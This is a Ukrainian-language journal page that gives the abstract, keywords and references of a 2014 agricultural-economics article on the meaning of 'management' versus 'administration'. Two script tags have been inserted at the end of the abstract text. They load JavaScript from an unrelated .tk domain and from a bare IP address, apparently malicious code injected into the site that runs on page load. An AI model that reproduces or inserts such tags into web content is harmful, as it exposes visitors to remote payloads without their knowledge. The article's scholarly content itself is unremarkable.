ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 351:378(477)
Проблеми економічної теорії

Інтерпретація понять «управління» і «менеджмент» та абстрагування їх змісту в теорії аграрної економіки / Файчук О. М. // Економіка АПК. - 2014. - № 3 - С. 87

Під впливом управлінської думки вчених західних країн, де вона почала формуватися ще на початку ХХ ст., відбувалася поступова заміна в назвах сучасних підручників і посібників слова «управління» на слово «менеджмент». Аналіз сучасного стану численних наукових публікацій, підручників, навчальних посібників та дисертацій з управлінських проблем останніх двох-трьох десятиліть показує, що в них часто трапляється некоректне використання термінів «управління» й «менеджмент» із відривом від їхньої семасіологічної сутності. А свого роду мода на вживання цих популярних слів у ряді випадків зумовлює девальвацію їхнього змісту. Така ситуація негативно впливає на оволодіння теорією управління студентами аграрних ВНЗ і зумовлює доцільність проведення додаткових досліджень. Менеджмент як явище у суспільному житті в його науковому класичному тлумаченні - це найвища ступінь прояву управлінського мистецтва, в основі якого лежить природний талант, спеціальна професійна підготовка, глибокий інтелект, гранична висока мотивація. Табл.: 2. Рис.: 1. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: менеджмент, управління, управлінські явища, блоки управлінських знань, теми занять, інтерпретація явищ

Список використаних джерел

 1. Ковальова Т.В. Великий тлумачний словник української мови / Т.В. Ковальова. – Х.: Фоліо, 2005. – 788 с.
 2. Винер Н. Кибернетика, или управление и связь в животном и машине. 2-е изд / Н. Винер. – М.: Наука, 1983. – 340 с.
 3. Файоль А. Управление – это наука и искусство / А. Файоль, Г. Эмерсон, Ф. Гейлор, Г. Форд. – М.: Республика, 1992. – 316 с.
 4. Oxford Advanced Learner’s Dictionary of Current English / Ed. by A.S.Hornby. – Oxford: Oxford University Press, 1994. – 1055 p.
 5. Завадський Й. С. Менеджмент. Т. 1 / Й. С. Завадський. – К. : Україно-фінський інститут менеджменту і бізнесу, 1997. – 544 с.
 6. Ґріфін Р. Основи менеджменту: підруч. / Р. Ґріфін, В. Яцура; наук. ред. В. Яцура, Д. Олесневич. – Львів: БаК, 2001. – 624 с.
 7. Чорний Г.М. Управління: концептуальні засади національного менеджменту: моногр. / Г.М. Чорний. – К.: ННЦ «ІАЕ», 2005. – 102 с.
 8. Лоза Г.М. Основы научного управления. Для руководителей колхозов и совхозов; под. ред. акад. ВАСХНИЛ Г.М. Лозы. – М.: Экономика, 1973. – 272 с.
 9. Тихонов В.А. Труд руководителя: учеб. пособие для руководящих работников сельскохозяйственных органов, руководителей колхозов и совхозов; под ред. акад. ВАСХНИЛ В.А. Тихонова. – М.: Экономика, 1975. – 166 с.
 10. Завадский И.С. Управления сельскохозяйстенным производством / И.С. Завадский. – К.: Издат. объед. «Вища школа», 1978. – 312 с.
 11. Галажу В.Г. Система управления качеством в сельськохозяйственых предприятиях / В.Г. Галажу, Т.Г. Дудар. – Львов: Вища школа. Изд-во при Львов. ун-те, 1980. – 160 с.
 12. Залевский Л.Д. Управление сельськохозяйственным производством / Л.Д. Залевский, В.А. Беспалов. – К.: Вища школа, 1980. – 254 с.
 13. Ушачов И.Г. Управление сельскохозяйственным производством / И.Г. Ушачов. – М. Экономика. – 1978. – 328 с.
 14. Barkema H.G. Management challenges in a new time / H.G. Barkema // Academy of Management Journal. – 2002. – Vol.10. – P. 916 – 930.
 15. Carroll S.J. Are the classical management functions useful in describing managerial work / S. J. Carroll, D. A. Gillen // Academy of Management Review.–1987. – Vol. 1.– 48 p.
 16. Kets De Vries M. R. Global leadership from a to z: creating high commitment organizations / M. R. Kets De Vries // Organizational dynamics. – 2002. – Vol. 4-5. – P. 295–309.
Читати статтю: 14_03_87-92.pdf
Читати переклад статті: 1403chornyi_myschenko_faichuk.pdf